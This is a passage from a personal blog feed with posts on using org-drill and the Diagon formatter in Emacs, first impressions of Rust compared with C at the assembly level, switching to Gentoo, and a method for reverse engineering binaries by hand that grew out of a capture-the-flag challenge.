Jakob's Blog http://jakob.space/blog This is my very infrequently updated blog. There's not really any set topic, it's just a place for whatever I write. Replacing Anki With org-drill http://jakob.spaceReplacing+Anki+With+org-drill http://jakob.spaceReplacing+Anki+With+org-drill Fri, 13 Jul 2018 09:53:13 EST <p class="indent">Recently, I read Michael Nielsen's essay, <a href="http://augmentingcognition.com/ltm.html">"Augmenting Cognition"</a>. It talks about some very interesting use cases for the spaced repetition software "Anki" that made me want to try it out again. I'm familiar with Anki, as I used it extensively throughout my last year of high school to study for AP exams. At the time, Anki's "killer feature" for me over similar software was being able to typeset mathematical notation in LaTeX (the exams were Chemistry and Calculus, so almost all of the material to memorize was mathematical notation). It's a great piece of software; I've been using it with the brother I'm helping through summer school. But ever since I began using Gentoo, I've been trying to avoid packages like QtWebView, which has deterred me from installing Anki on my machine. With a little bit of searching, however, I found that there was an Emacs package for spaced repetition named 'org-drill', so I decided to check it out.</p> <p class="indent">org-drill is included in org by default (which happens to be included in Emacs by default), but it does need to be enabled. The steps to do so are outlined on the corresponding <a href="https://orgmode.org/worg/org-contrib/org-drill.html">worg page</a>. So far, I've used it to study German vocabulary and the material for my ham radio license exams, and I'm very happy with it. It has all of the features you might want from Anki, like Cloze deletion and double-sided cards, but I find that card creation is even more intuitive in org markup. 
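For a taste, here's roughly what a pair of cards looks like in an org file (the headings and vocabulary are my own example, following the conventions from the worg page):

```
* Vocabulary
** Keyboard                                        :drill:
   :PROPERTIES:
   :DRILL_CARD_TYPE: twosided
   :END:
   Translate this word.
*** German
    die Tastatur
*** English
    the keyboard
** Cloze example                                   :drill:
   The German word for keyboard is [die Tastatur].
```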
Clozes are as simple as enclosing the answers in square brackets, and multi-sided cards just entail making multiple headings and setting the ":DRILL_CARD_TYPE:". You can even write your own card types in elisp. Another benefit of using org markup as the source for cards is that I can easily transform a plain text file into a deck using emacs macros.</p> <p class="indent">Unlike Anki, however, org-drill has support for the SM5 and SM8 scheduling algorithms. <a href="https://apps.ankiweb.net/docs/manual.html#what-algorithm">Anki is quite outspoken about the benefits of SM2 over the later renditions,</a> but I appreciate that I at least have the option to use these schedulers if I want to. The algorithms' parameters can also be finely tuned; the one I've found most useful is 'org-drill-learn-fraction', which I can use to decrease the amount of time before I see a card again.</p> <p class="indent">As I mentioned earlier, the feature that brought me to Anki was its support for typesetting math with LaTeX. Emacs certainly has support for rendering LaTeX, but I have a pretty wonky setup where I'm running Emacs in a terminal emulator, so what I opted for instead was a typesetting language that renders to unicode text. There are quite a few of these, but the one I was most impressed with is <a href="https://arthursonzogni.com/Diagon/">Diagon</a>. It's meant to be run in the browser, but the backend is written in C++ and can be compiled to run natively. Be warned, however, that the build system does require Java.</p> <p class="indent">First, I replace 'src/main.cpp' with the following. 
The version in VCS will unconditionally run the SequenceTranslator, but this modification enables us to select which translator to use from a command-line argument.</p> <pre><code class="lang-cpp">#include &quot;translator/Translator.h&quot;

#include &lt;iostream&gt;

int main(int argc, const char **argv)
{
    if (argc != 2) {
        std::cerr &lt;&lt; &quot;usage: &quot; &lt;&lt; argv[0] &lt;&lt; &quot; [translator]&quot; &lt;&lt; std::endl;
        return 1;
    }

    std::string input;
    for (std::string line; std::getline(std::cin, line);) {
        input += line + &quot;\n&quot;;
    }

    auto translator = TranslatorFromName(argv[1]);
    std::cout &lt;&lt; (*translator)(input, &quot;&quot;) &lt;&lt; std::endl;
    return 0;
}
</code></pre> <p>Then, compiling is as easy as</p> <pre><code class="lang-sh">cd tools/antlr/
./download_and_patch.sh
cd ../../
mkdir build
cd build
cmake ..
make
</code></pre> <p>And for Emacs integration, I've added the following to my '.emacs'</p> <pre><code class="lang-elisp">;; Applies Diagon&#39;s &quot;Math&quot; formatter to the current region, replacing
;; the contents of the region with the formatted output.
(defun format-math-at-region ()
  (interactive)
  (let* ((math-to-format (buffer-substring (region-beginning) (region-end)))
         (command (format &quot;echo \&quot;%s\&quot; | diagon Math&quot; math-to-format)))
    ;; Bad and hacky. I&#39;m aware.
    (kill-region (region-beginning) (region-end))
    (insert (string-trim-right (shell-command-to-string command)))))
</code></pre> <p>It's not as powerful as LaTeX, but it certainly suits my needs.</p> <p><img src="/img/format_math_demo.gif" alt="Demo"></p> First Impressions of the Rust Programming Language http://jakob.spaceFirst+Impressions+of+the+Rust+Programming+Language http://jakob.spaceFirst+Impressions+of+the+Rust+Programming+Language Fri, 8 Jun 2018 13:02:33 EST <p class="indent">C is almost 50 years old, and C++ is almost 40 years old.
While age is usually indicative of mature implementations with decades of optimization under their belts, it also means that the language's feature set is mostly devoid of modern advancements in programming language design. For that reason, you see a great deal of encouragement nowadays to move to newer languages - they're designed with contemporary platforms in mind, rather than working within the limitations of platforms like the PDP-11. Among said "new languages" are Zig, Myrddin, Go, Nim, D, and Rust... even languages like Java and Elixir that run on a virtual machine are occasionally suggested as alternatives to the AOT-compiled C and C++.</p> <p class="indent">I have plans to look into the characteristics that distinguish each and every one of these new programming languages, learning them and documenting my first impressions in the form of blog posts. This post is the beginning of that adventure: my first impressions of Rust. I chose to evaluate Rust first rather than one of the other aforementioned contenders for a few reasons. For one, it's backed by some big names like Mozilla, so I'm expecting it to have more polished documentation than its independently developed counterparts - we might as well step off with a language that I can learn without needing to read the compiler's source code. Also, I've been fairly critical of Rust in the past because that view was in line with the opinions of my friends, but now that I've decided to go out of my way to learn a new programming language, I might as well use this as an opportunity to see if my criticisms were unfounded.</p> <p class="indent">Learning these new programming languages is certainly going to be an undertaking. Because Python and C were the first languages I was introduced to, I was able to simply buckle down, learn them, and apply them to pretty much everything I was doing at the time. When I tried to learn other languages later on, though, I had a hard time gauging whether or not I was making progress.
I think that this is because I wasn't engaged with what I was learning; I was, at most, writing trivial programs with the language I was learning, and defaulting to C or Python whenever I needed to work on a "real" project. My goal is to learn these new languages to the extent that I can meaningfully evaluate them, so I've looked back on my past attempts and come to the conclusion that I either need to use them to develop something nontrivial, or make contributions to a free software project written in the language, as suggested by <a href="https://hackernoon.com/unconventional-way-of-learning-a-new-programming-language-e4d1f600342c">several</a> <a href="https://codewithoutrules.com/2017/09/09/learn-a-new-programming-language/">articles</a>. In the case of this post, it will be the former, as I've actually come to like Rust enough to use it for my <a href="https://github.com/TsarFox/rebuild">reimplementation of Ken Silverman's BUILD engine</a>.</p> <p class="indent">With my introduction for this series out of the way, we can get into my first impressions of Rust. The first step was diving into the documentation to learn it, so I guess it would make sense to begin with that. Simply put, there is no shortage of high-quality learning material for Rust. <a href="https://doc.rust-lang.org/book/second-edition/index.html">"The Rust Programming Language,"</a> the equivalent of TCPL for Rust, is surprisingly well-written. Even if you're familiar with a systems programming language like C, I would still recommend reading it cover-to-cover. I had initially started off with the "Rust for C++ Programmers" and the "Learn X in Y Minutes" tutorial for Rust, but until I read TRPL, there was a lot that didn't make sense, and I was completely lost when it came to using the standard library. The book is friendly, encouraging, and full of great examples that outline common patterns in the standard library and various third party crates. 
My only real complaint with TRPL is that some of the analogies set foot into the territory of <a href="https://www.hillelwayne.com/post/monad-tutorials/">monad tutorials</a>. Some exceptional examples are comparing a <a href="https://doc.rust-lang.org/book/second-edition/ch15-04-rc.html">reference-counting pointer to the TV in a family room</a>, or comparing <a href="https://doc.rust-lang.org/book/second-edition/ch04-01-what-is-ownership.html">references to tables at a restaurant</a>. They aren't all bad, and there are a few that I actually really enjoy, like the comparison of <a href="https://doc.rust-lang.org/book/second-edition/ch16-02-message-passing.html">message passing concurrency to a river</a>, but most of them try so hard to relate the concept to something in the real world that they end up being unhelpful. Fortunately, the book is on GitHub and accepts pull requests, so I have plans to send in suggestions for some alternatives.</p> <p class="indent">Despite the presence of great documentation, I predict that most people are still going to have a hard time learning Rust. It brings some concepts that you probably haven't seen before. As far as I'm aware, this is the first programming language to offer compile-time memory management. (C++ has smart pointers which are definitely similar, but those rules are enforced at runtime. Rust tightly integrates its concepts of ownership and lifetimes into the compiler.) TRPL does a good job of introducing the concepts for compile-time memory management, but I feel that it only really scratches the surface. For that reason, I'd like to point anyone learning Rust to a great supplementary resource on the memory model: <a href="http://cglab.ca/~abeinges/blah/too-many-lists/book/">"Learning Rust With Entirely Too Many Linked Lists"</a>. It's hands-on, and just about as approachable as TRPL.
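To make the ownership idea concrete, here's a small sketch of my own (not from TRPL) showing the kind of program the rules reject at compile time:

```rust
fn main() {
    let s = String::from("hello");
    let t = s; // ownership of the heap buffer moves to `t`...

    // ...so a later use of `s` would be a compile-time error:
    // println!("{}", s); // error[E0382]: use of moved value: `s`

    println!("{}", t); // prints "hello"
}
```

The buffer is freed exactly once, when `t` goes out of scope - no explicit free, no garbage collector.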
<a href="http://softwaremaniacs.org/blog/2016/02/12/ownership-borrowing-hard/en/">This post</a> might also help if you're having trouble grasping the general concept.</p> <p class="indent">That brings me to another point - the features that Rust brings to the table might be difficult to learn, but learning to use them pays off in the end. Compile-time memory management requires designing your programs in a way you might not be used to, but it definitely beats manual memory management, or letting a runtime take care of garbage collection.</p> <p class="indent">C's memory model, for example, is manually managed. Heap allocations are performed via malloc(3) and calloc(3), and those allocations exist until free(3) is called. Take this trivial piece of code for making a heap allocation containing a string:</p> <pre><code class="lang-c">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
    char *buf;

    // Make a heap allocation of 14 bytes.
    buf = calloc(14, 1);

    // calloc(3) CAN return a null pointer.
    if (buf == NULL) {
        return 1;
    }

    // Fill the allocated buffer with a string, and print it.
    strcpy(buf, &quot;Hello, world!&quot;);
    puts(buf);

    // Free the heap allocation, since we&#39;re done with it.
    // This won&#39;t always be at the end of the function, but it usually will be.
    free(buf);
    return 0;
}
</code></pre> <p class="indent">This model requires keeping track of the allocations you make and ensuring that they're freed when they aren't needed anymore - we easily could've forgotten that call to free(3). In this really trivial example, it doesn't matter because the process exits and the operating system reclaims the heap page, but if the program kept running after printing that string, we'd be dealing with a memory leak. Anyway, C's manual memory management is explicit enough that you can more or less predict what this will compile down to.
GCC 6.4.0 emits the following amd64 code:</p> <pre><code class="lang-asm"># Prelude.
55            pushq %rbp
4889e5        movq %rsp, %rbp
4883ec20      subq $0x20, %rsp
897dec        movl %edi, -0x14(%rbp)
488975e0      movq %rsi, -0x20(%rbp)

# calloc(14, 1), store pointer on the stack.
be01000000    movl $1, %esi
bf0e000000    movl $0xe, %edi
e892feffff    callq sym.imp.calloc
488945f8      movq %rax, -8(%rbp)

# Check for null pointer.
48837df800    cmpq $0, -8(%rbp)
7507          jne 0x750
b801000000    movl $1, %eax
eb3b          jmp 0x78b

# (Really optimized) call to strcpy.
488b45f8      movq -8(%rbp), %rax
48ba48656c6c. movabsq $0x77202c6f6c6c6548, %rdx
488910        movq %rdx, 0(%rax)
c740086f726c. movl $0x646c726f, 8(%rax)
66c7400c2100  movw $0x21, 0xc(%rax)

# puts(buf)
488b45f8      movq -8(%rbp), %rax
4889c7        movq %rax, %rdi
e846feffff    callq sym.imp.puts

# free(buf)
488b45f8      movq -8(%rbp), %rax
4889c7        movq %rax, %rdi
e82afeffff    callq sym.imp.free

# Teardown.
b800000000    movl $0, %eax
c9            leave
c3            retq
0f1f00        nopl 0(%rax)
</code></pre> <p>The equivalent in Rust is similar, but as you'll see, we don't need to explicitly free the heap allocation.</p> <pre><code class="lang-rust">use std::io;
use std::io::Write;

fn main() {
    let buf = Box::new(b&quot;Hello, world!\n&quot;);
    io::stdout().write(*buf);
}
</code></pre> <p>rustc 1.25 compiles this down into the following amd64 code¹:</p> <pre><code class="lang-asm"># Prelude.
4883ec48      subq $0x48, %rsp

# Heap allocation, made by the &#39;std::boxed::Box&#39; smart pointer.
b808000000    movl $8, %eax
89c1          movl %eax, %ecx
4889cf        movq %rcx, %rdi
4889ce        movq %rcx, %rsi
e8caedffff    callq sym.alloc::heap::exchange_malloc::h42fa40019bea1ed3

# We actually end up storing a reference to the bytestring, rather than copying the individual bytes into the box.
# Regardless, I think this should still illustrate heap allocation fairly well, and I&#39;m trying to keep the example somewhat simple, so we&#39;ll roll with it.
488d0de3e705. leaq str.Hello__world, %rcx
4889c6        movq %rax, %rsi
488908        movq %rcx, 0(%rax)
4889742410    movq %rsi, 0x10(%rsp)

# Get the handle to stdout.
e855590000    callq sym.std::io::stdio::stdout::h537f6f9874379378
4889442408    movq %rax, 8(%rsp)
488b442408    movq 8(%rsp), %rax
4889442430    movq %rax, 0x30(%rsp)

# stdout.write(*buf);
488b4c2410    movq 0x10(%rsp), %rcx
488b11        movq 0(%rcx), %rdx
be0e000000    movl $0xe, %esi
89f1          movl %esi, %ecx
488d7c2418    leaq 0x18(%rsp), %rdi
488d742430    leaq 0x30(%rsp), %rsi
e8965a0000    callq sym._std::io::stdio::Stdout_as_std::io::Write_::write::h12094683b11bc5a8

# Free the &#39;std::io::Result&#39; that&#39;s returned by &#39;write&#39;.
# We didn&#39;t check its value, which is considered bad form, but this is just a simple example.
488d7c2418    leaq 0x18(%rsp), %rdi
e8fef4ffff    callq sym.core::ptr::drop_in_place::h72bdea260ebb17c9

# Free the stdout handle.
488d7c2430    leaq 0x30(%rsp), %rdi
e8a6f4ffff    callq sym.core::ptr::drop_in_place::h55479d5b85e18c56

# Finally, free the heap allocation we made.
488d7c2410    leaq 0x10(%rsp), %rdi
e8faf5ffff    callq sym.core::ptr::drop_in_place::ha5ac9a364139ad29

# Teardown.
4883c448      addq $0x48, %rsp
c3            retq
</code></pre> <p class="indent">Besides needing to allocate a handle to interact with stdout, rustc's emitted assembly does pretty much the same thing as that of GCC - allocate a buffer, fill it, then free it when we're done using it. Rust just façades this process with a friendlier abstraction.</p> <p class="indent">Another feature I've come to really enjoy is that there are no more NULL pointers - they've been replaced by a strict type system à la Haskell. In the C example above, we saw that calloc(3) can return NULL if glibc isn't able to allocate enough memory. We easily could've forgotten to put in the check to make sure it isn't NULL, in which case we would get a segmentation fault. Preventing this sort of thing is what people are talking about when they say "memory safety."
For a segmentation fault, the operating system has to jump in because we're doing something we shouldn't - dereferencing a NULL pointer. There are plenty of other naughty things we can do in C, like freeing a heap allocation twice, or even worse, writing outside the bounds of a buffer. Rust aims to have the compiler step in when we do something dumb, rather than leaving that to the operating system or exploit mitigation systems. To do this for NULL-able references, Rust provides an "Option" type (and the "Result" type) that can represent either something or nothing. You see it used extensively in the standard library. Consider the 'find' method of std::string::String, a method for finding the index of a substring in a string. There's the possibility that the substring exists in the string, in which case we'd just return that index, but what if it doesn't exist? In the case of C, we might return some silly value like '-1', but in Rust, we return an Option&lt;usize&gt; - either some usize value, or nothing. And the compiler makes sure we understand the implications of this.</p> <pre><code class="lang-rust">fn main() {
    let to_search = String::from(&quot;I may contain foo.&quot;);
    let index = to_search.find(&quot;foo&quot;);

    println!(&quot;index - 5: {}&quot;, index - 5);
}
</code></pre> <p class="indent">This is a pretty inane example, but please bear with me. If we try to compile this, rustc errors out, because we're trying to treat a variable that might represent nothing as if it were guaranteed to be something.</p> <pre><code>error[E0369]: binary operation `-` cannot be applied to type `std::option::Option&lt;usize&gt;`
 --&gt; test.rs:4:31
  |
4 |     println!("index - 5: {}", index - 5);
  |                               ^^^^^^^^^
  |
  = note: an implementation of `std::ops::Sub` might be missing for `std::option::Option&lt;usize&gt;`
</code></pre> <p class="indent">This would be fixed by inspecting the Option, ensuring that it <em>is</em> something, rather than nothing.
It's an algebraic data type, so we can destructure it and work with the index if 'find' returned something.</p> <pre><code class="lang-rust">fn main() {
    let to_search = String::from(&quot;I may contain foo.&quot;);

    if let Some(index) = to_search.find(&quot;foo&quot;) {
        println!(&quot;index - 5: {}&quot;, index - 5);
    }
}
</code></pre> <p class="indent"><code>if let</code> is a syntax construct that I don't think any other language has, so I should probably give a brief explanation. That <code>if</code> block will run if and only if 'find' returned an instance of 'Option' that was 'Some', rather than 'None'. If an instance of 'Some' is returned, it contains our index, so we can destructure it and set that value to the variable, <code>index</code>, which we go on to use.</p> <p class="indent">You might expect this strictness to bring frustration, but the compiler emits errors worded simply enough that a layman could understand them, and often makes suggestions for fixing the code in question. The above isn't a great example, so here's a better one:</p> <pre><code class="lang-rust">fn tabulate_slice(slice: &amp;[u8]) {
    for elem in slice.iter() {
        println!(&quot;{}&quot;, elem);
    }
}

fn main() {
    let vec = vec![1, 2, 3];
    tabulate_slice(vec);
}
</code></pre> <pre><code>error[E0308]: mismatched types
 --&gt; test.rs:9:20
  |
9 |     tabulate_slice(vec);
  |                    ^^^
  |                    |
  |                    expected &amp;[u8], found struct `std::vec::Vec`
  |                    help: consider borrowing here: `&amp;vec`
</code></pre> <p class="indent">Rust has a great deal of functionality that makes it feel like your typical high-level Ruby or Python, despite being a compiled language.
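As a sketch of that high-level feel (my own example, not from the book), iterator adapters chain together much like they would in Ruby or Python, while still compiling down to a plain loop:

```rust
fn main() {
    // Sum the squares of the even numbers below 10.
    let sum: u32 = (0..10)
        .filter(|n| n % 2 == 0)
        .map(|n| n * n)
        .sum();

    println!("{}", sum); // prints 120
}
```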
And it isn't limited to what I described above - here are a few of the other features I was really impressed with:</p> <h3>Conditionals are Expressions</h3> <pre><code class="lang-rust">let var = if true { 1 } else { 2 };
</code></pre> <h3>No parentheses for the expression part of if/while/for</h3> <p>Heh, I bet you've seen enough of that already.</p> <h3>Semantics for Infinite Loops</h3> <pre><code class="lang-rust">loop {
    break;
}
</code></pre> <h3>Semantics for Unused Variables/Parameters</h3> <pre><code class="lang-rust">for _ in 0..5 {
    println!(&quot;I&#39;m printed 5 times!&quot;);
}
</code></pre> <h3>Range Notation, Type Inference, and Iterators</h3> <p>Again, you've seen these already.</p> <h3>Tuples, Destructuring, and Pattern Matching via <code>match</code> and <code>if let</code> Expressions</h3> <pre><code class="lang-rust">match to_search.find(&quot;foo&quot;) {
    Some(index) =&gt; println!(&quot;Foo at {}&quot;, index),
    None =&gt; println!(&quot;No foo :(&quot;),
}

// Or, more idiomatically:
if let Some(index) = to_search.find(&quot;foo&quot;) {
    println!(&quot;Foo at {}&quot;, index);
} else {
    println!(&quot;No foo :(&quot;);
}
</code></pre> <h3>Automated Testing is Integrated Into the Build System</h3> <pre><code class="lang-rust">#[cfg(test)]
mod tests {
    #[test]
    fn it_works() {
        assert_eq!(2 + 2, 4);
    }
}
</code></pre> <p>This will be run upon invocation of <code>cargo test</code>.</p> <h3>Isolation of Unsafe Code</h3> <p class="indent">There's a set of <a href="https://doc.rust-lang.org/book/second-edition/ch19-01-unsafe-rust.html">rules</a> to ensure that the implications of working with unsafe code are properly contained, but the gist of it is that unsafe code is isolated by the scoping system.
Mostly, I'm glad that the language allows you to work with unsafe code at all.</p> <pre><code class="lang-rust">fn main() {
    unsafe {
        asm!(&quot;INT3&quot;);
    }
}
</code></pre> <hr> <p class="indent">That's my opinion on the language design aspect, but the community and ecosystem are important as well. My experience with the Rust community is limited, but from what little I have seen, those in the community are friendly and rational. I submitted <a href="https://github.com/mattnenterprise/rust-imap/issues/67">a few issues to rust-imap</a> and received prompt and helpful responses. I can also confidently say that the Rust ecosystem is a pleasure to work with. It obviously isn't as mature as some other language ecosystems, but adding a "crate" dependency to your projects is as easy as adding a line to your 'Cargo.toml'. It's equally easy to publish the code and documentation for crates you've made yourself. I threw together <a href="https://github.com/TsarFox/wildmidi">a library for interacting with WildMIDI</a>, and a <a href="https://docs.rs/">docs.rs</a> page popped up without any intervention from me. Painless.</p> <p class="indent">The process of linking those crates into the executable is relatively primitive, and there are a few complaints in that respect. It's mostly static linking, so the argument is "you get outdated copies of several libraries on your computer." However, whether dynamic linking is a better alternative is a <a href="http://harmful.cat-v.org/software/dynamic-linking/">debate I don't want to get into in this post</a>. Right now I'll leave it as, "it's not an option in the current implementation, and that's a disadvantage," even if I'm blissfully ignorant of the size of my Rust binaries and <em>might</em> have some complaints about dynamic linking.</p> <p>All in all, I'm very happy with Rust.
Maybe it isn't "there" yet as a viable replacement for C, but it's promising and I have a feeling that, with time, it will fit nicely into the GNU/Linux ecosystem.</p> <hr> <p class="indent">1: A previous version of this post included <em>all</em> of the assembly emitted by the compiler, but in this revision, I've chosen to remove Rust's error/panic handling code because I believe that it actually detracts from the concept I'm trying to show.</p> Installing Gentoo: One Month Later http://jakob.spaceInstalling+Gentoo%3A+One+Month+Later http://jakob.spaceInstalling+Gentoo%3A+One+Month+Later Mon, 28 May 2018 20:10:39 EST <p class="indent">It seems that the general consensus on "distro hopping," the act of constantly switching between distributions of GNU/Linux, is that it's a bad habit that should be consciously avoided. If you do a search for the term, you'll get articles with titles along the lines of "How I Stopped Distro Hopping." But it's also a term that gets thrown around loosely, and I think that "distro hopping" is an acceptable practice in a lot of the contexts where the phrase is used. Needless to say, I've "hopped" distributions in the past month, and this blog post is going to describe the highs and lows of that experience.</p> <p class="indent">My experiences with GNU/Linux began when I installed openSUSE about four years ago. I chose it over something more conventional like Ubuntu for its integration with KDE Plasma 4 (I'm aware that I suffered from bad taste at the time). I stuck with that until I decided to try Fedora for no particular reason, which was short-lived. I later switched to Arch Linux to fit in with the cool kids, and that became my daily driver for a little over two years. Recently, however, I've switched to Gentoo, because I've wanted to try GNU/Linux without systemd and friends.
Many conversations with people over IRC convinced me that the maintenance model of those packages is <a href="https://github.com/systemd/systemd/issues/6237">concerning, to say the least</a>, and that it's preferable if the operations-critical parts of my operating system aren't riddled with CVEs. Gutting Arch of the beasts within is possible, but seriously complicates everything, so I decided that the best course of action was to just throw the baby out with the bathwater and use this as an opportunity to experiment with something I'd been meaning to try.</p> <p class="indent">Gentoo has been on my radar ever since I installed Arch, as I had several friends who loved to talk about the merits of a source-based distribution. My original plan was to wait until I had a machine I could comfortably experiment with, separate from my workstation or laptop, but since I was hopping distros anyway, I decided to just go ahead and get my hands dirty. Of course, I didn't go into the whole migration process without concerns. For one, I want to cleanse <em>all</em> of my machines of systemd. That includes the Raspberry Pi I use as a home server, and I don't think it's powerful enough to be compiling everything from source. I opted to install Alpine on that instead. The other problem was that my laptop's only storage device was an SSD, which I didn't want to subject to excessive writes. Fortunately, the solution to that was straightforward: I was able to mount '/var/tmp/portage' as tmpfs so that all the object files generated while compiling got dumped to an in-memory filesystem instead of the disk.</p> <p class="indent">After making sure that everything I needed to do was possible on the new setup, I went ahead and installed it on both my workstation and laptop. The canonical reference for installing Gentoo, dubbed "the handbook," is incredibly well-written, so the installation process was painless.
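For reference, the tmpfs mount I mentioned boils down to a single line in '/etc/fstab' (the size and options here are my own choices; tune them to your RAM):

```
tmpfs   /var/tmp/portage   tmpfs   size=4G,uid=portage,gid=portage,mode=775,noatime   0 0
```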
I think the quality of documentation is a big benefit that Gentoo has over Arch; everyone praises the Arch wiki, but I find that the Gentoo documentation is far more informative and much more consistent. Setting it up past the initial installation really wasn't difficult either - I had X11 running the same night.</p> <p class="indent">I also used this as an opportunity to try out some new software. On Arch, I was using i3 and rxvt-unicode, but now I'm on dwm and st and I'm really enjoying both of them. These programs are configured at compile-time, which would've made using them on Arch a bit unwieldy, but Gentoo's package manager makes the whole process trivial. I just throw any patches I want in '/etc/portage/patches', edit the 'config.h' files in '/etc/portage/savedconfig', and emerge the package.</p> <p class="indent">Gentoo's package manager is by far the best I've used in my four years of running GNU/Linux. Being able to drive it through a couple of files in '/etc' makes for a great interface. It also brings USE flags, which is probably the poster child of Gentoo's features. If you're not familiar with USE flags, they allow you to enable or disable certain features at compile-time. As an example, say I want to play some Goldeneye on my Nintendo 64 and use my computer as a monitor. I have a cheap USB capture card with a kernel driver exposing the Video4Linux API. I'll need some sort of video player to put the stream on my monitor, but that video player is going to need to come with support for said Video4Linux API. I'm what you might call a special case - most GNU/Linux users don't have capture cards, so that feature isn't important to them. If it isn't important to them, why should they have to waste disk space housing all the code and dependencies for it? This is where conditional compilation comes in. During the process of turning source code into executable binaries, certain features can be turned on or off.
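In Portage's terms, those switches end up as a line or two of plain configuration (the paths are real Portage conventions; the exact atoms and flags below are just my illustration):

```
# /etc/portage/make.conf - enable a feature globally...
USE="v4l"

# /etc/portage/package.use/mpv - ...or only for a single package.
media-video/mpv v4l
```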
In a binary distribution like Arch Linux, the package maintainers need to make an executive decision about which features should be enabled, because they're making a binary for <strong>everyone</strong>. And, last I checked, they decided that V4L support wasn't important enough for them to enable it. Bummer. If you want that feature, you'll need to compile it yourself. And if a package has features you don't care about, bummer. You have to either deal with all the dependencies that those features bring in, or compile it yourself.</p> <p class="indent">USE flags make this a lot easier by integrating conditional compilation options into the package manager, rather than forcing you to wrangle with the configure script of whatever build system the software uses. For example, I can compile mpv with support for V4L simply by enabling the 'v4l' USE flag. The nice thing about this is that all packages supporting V4L recognize this same USE flag, and I can enable it globally - compiling V4L support into everything on my system without putting much thought into it. And if I just want it for mpv instead of everything on my system, I'm also able to enable it for just certain packages.</p> <p class="indent">This freedom does come with the downsides of, well, having to compile everything from source. Compiling software takes time and processing power, and trying to optimize the process has caused me some headaches. In Gentoo, you'll want to pick a decent value for '--jobs' in 'make.conf' so that compilation is fast. '--jobs', or '-j', is a signal to the build system that it can run some number of tasks in parallel. I started out with '-j8' on my laptop, since it has 8 cores. This worked great for smaller packages, but when I tried to emerge Firefox, my machine gave up half-way through. It was still running.
I could Ctrl+Z from 'emerge' and use it, but the compilation process had hung and my only option was to restart it, whereupon it would hang at another point in the compilation process. I tried it again with '-j4' and it was able to compile without any trouble; it just took much longer. I had a similar issue on my workstation - it has a quad-core processor so I was using '-j4', but I was regularly getting segmentation faults while emerging large packages such as LLVM (apparently a hardware issue that I need to look into), so I lowered it to '-j2'. Of course, looking back on it now, <a href="https://blogs.gentoo.org/ago/2013/01/14/makeopts-jcore-1-is-not-the-best-optimization/">the number of cores your machine has isn't a good value for '-j' anyway.</a></p> <p class="indent">Another great thing about Portage is the API for making your own packages. It's shell scripts, so it's similar to how you'd go about making a package on Arch, but I find Portage's API feels like much less of a hack. For one, <a href="https://devmanual.gentoo.org/">the documentation</a>, again, towers over that of Arch, but it also brings something reminiscent of a standard library: eclasses, which enable you to abstract the commonality between packages using the same build system. Also, instead of having just one big AUR, unofficially maintained packages are distributed in user-managed "overlays." I'd think that pacman can probably do something similar, but you almost never see it in practice.</p> <p class="indent">All in all, I'm very happy with the level of customization and freedom that Gentoo offers me, and I haven't missed systemd one bit. OpenRC, ALSA, and wpa_supplicant are all I need. Going forward, I'm hoping to become more involved in the Gentoo community - becoming active on the forums and IRC, and hosting an overlay for the handful of ebuilds I've made.
The Gentoo community seems much more tightly-knit than the Arch community, and I'm looking forward to meeting some new friends.</p> Decompilation By Hand http://jakob.spaceDecompilation+By+Hand http://jakob.spaceDecompilation+By+Hand Thu, 1 Mar 2018 19:00:33 EST <p class="indent">My capture-the-flag team played in the Insomni'hack teaser this year. During the competition, I worked on a single challenge titled "sapeloshop." It was labeled as "Medium-Hard," and it was in the binary exploitation category. The source code for the server wasn't provided, so reverse engineering was necessary. I don't think that having to reverse the binary was supposed to be the hard part, as most of the behavior could have been inferred through some high-level analysis, yet I spent nearly five hours fruitlessly trying to reverse it, and the subsequent burnout was bad enough that I went home early. This wasn't the first time a reversing task had gotten the best of me; there had been a few competitions last year where I felt a similar loss in motivation. Noticing this recurring pattern frustrated me, and that frustration drove me to think about ways to improve myself as a reverse engineer.</p> <p class="indent">My initial idea was to work on expanding my skill set, but with some further reflection, I came to the realization that the weakness was my process. I was going at the task of reverse engineering without a plan: beginning by opening the binary in radare, propagating from the entrypoint, and renaming a few variables as I went along. I was trying to make sense of the program by passively reading the disassembly listing. This <em>might</em> work for someone who lives and breathes assembly, but that certainly doesn't apply to me. What I needed was a way to engage with the binary at hand beyond trying to passively absorb it.</p> <p class="indent">With that, my first step was to come up with a more formally-defined idea of what's involved in "reverse engineering." 
I still don't think I have anything close to a complete description, but pondering on how reverse engineering tools are designed certainly helped to solidify my existing understanding. Namely, I was reminded of software suites advertised as "decompilers." They serve as a stepping stone in an <strong>iterative</strong> process of turning machine code into something that would be easier for a human to understand. They give an obviously machine-generated C/C++ representation of the machine code, and the reverse engineer continues by filling in the blanks with semantics.</p> <p class="indent">Now, I have a few issues with the idea of automated decompilation. For one, the tooling simply isn't accessible. The only working decompiler I've used, IDA Pro, is ridiculously expensive. Also, when I say, "working," I mean that it doesn't segfault upon opening the binary. Even IDA Pro doesn't work perfectly in every situation - especially those in which the binary has been intentionally obfuscated. Because of this, there are arguments against the use of decompilers: notably, <a href="https://blog.ret2.io/2017/11/16/dangers-of-the-decompiler/">this article</a>.</p> <p class="indent">But the goal wasn't to have a program to do the work for us anyway, it was to come up with a more effective methodology for reverse engineering a binary. Unlike software, human reversers can adapt to the situation at hand - they don't need rules defined in the same way that a computer would. As such, I've come up with a protocol in a similar vein to <a href="https://en.wikipedia.org/wiki/SQ3R">SQ3R</a> for reverse engineering machine code to higher-level constructs. The protocol is still in its infancy, and I have hopes to expand upon it in the future, but I have found it to still be quite useful in its current state.</p> <p class="indent">I'd consider subroutines to be the fundamental atoms of a binary, and that's what this protocol focuses on. 
However, being able to understand the subroutines that compose a program doesn't necessarily imply an understanding of the whole program. Techniques for understanding the program as a whole are something I hope to incorporate into the protocol in the future, but for now, they are given as a handful of necessary precursors.</p> <p class="indent">For one, you should get a high-level understanding of what the program does. I would recommend initially treating it as a black box: What does this program do? Is it a web server? A crypto algorithm? I find that it's useful to copy down any text that the program outputs, as you can use the string references later on when you look at the machine code. You should also test plenty of inputs. What does the program do for typical edge cases? What error handling does it do? This might all seem extremely mundane, but if you understand the program at this level, it gives you things to recognize in the disassembly listing. This is absolutely essential when it comes to something more complicated than the toy programs you might see in a capture-the-flag. I've been working a lot with the Team Fortress 2 binaries recently, and understanding how and where certain string references are used has given me a way to find just the functionality I'm interested in, as opposed to trying to understand the entire 33 MB shared object.</p> <p class="indent">That brings me to another point: you might not even need to reverse all of the subroutines in the binary. In a binary exploitation challenge, it might make sense to audit the seemingly mundane input-handling functions, but if you can tell from the 